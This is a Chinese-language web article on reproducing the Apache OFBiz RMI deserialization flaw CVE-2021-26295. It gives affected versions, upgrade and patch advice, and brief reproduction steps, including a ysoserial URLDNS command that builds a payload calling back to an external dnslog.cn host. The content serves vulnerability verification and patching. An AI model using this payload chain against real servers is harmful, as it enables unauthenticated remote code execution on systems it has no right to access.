溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
本篇文章為大家展示了如何實現Apache OFBiz RMI反序列化漏洞CVE-2021-26295的復現,內容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細介紹希望你能有所收獲。
Apache OFBiz是一個電子商務平臺,用于構建大中型企業級、跨平臺、跨數據庫、跨應用服務器的多層、分布式電子商務類應用系統。
近日,Apache OFBiz官方發布安全更新。Apache OFBiz 存在RMI反序列化前臺命令執行,未經身份驗證的攻擊者可以使用此漏洞來成功接管Apache OFBiz,建議相關用戶盡快測試漏洞修復的版本并及時升級。
【漏洞等級】 嚴重
【漏洞編號】
CVE-2021-26295
【影響版本】
Apache OFBiz < 17.12.06
(1)docker搭建漏洞環境
(2)DNSLOG平臺Get SubDomain,用ysoserial的URLDNS利用鏈生成文件
java -jar ysoserial.jar URLDNS http://isnrvo.dnslog.cn > dns.ot
(3)使用python腳本將生成的文件解碼轉換成hex
(4)利用轉換后的hex代碼,構造數據包發送請求
(5)DNSLOG平臺檢驗執行結果
可以看到,DNSLOG平臺收到響應,服務器執行代碼成功!
建議廣大用戶及時檢查相關軟件版本(可打開[OFBIZ_HOME/README] 文件, 查找Welcome to Apache OFBiz xxxx字樣信息確定版本),將Apacge OFBiz升級到最新版本。
【補丁信息】
補丁名稱:Apache OFBiz 遠程代碼執行漏洞補丁
補丁鏈接:https://ofbiz.apache.org/download.html#vulnerabilities
上述內容就是如何實現Apache OFBiz RMI反序列化漏洞CVE-2021-26295的復現,你們學到知識或技能了嗎?如果還想學到更多技能或者豐富自己的知識儲備,歡迎關注億速云行業資訊頻道。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
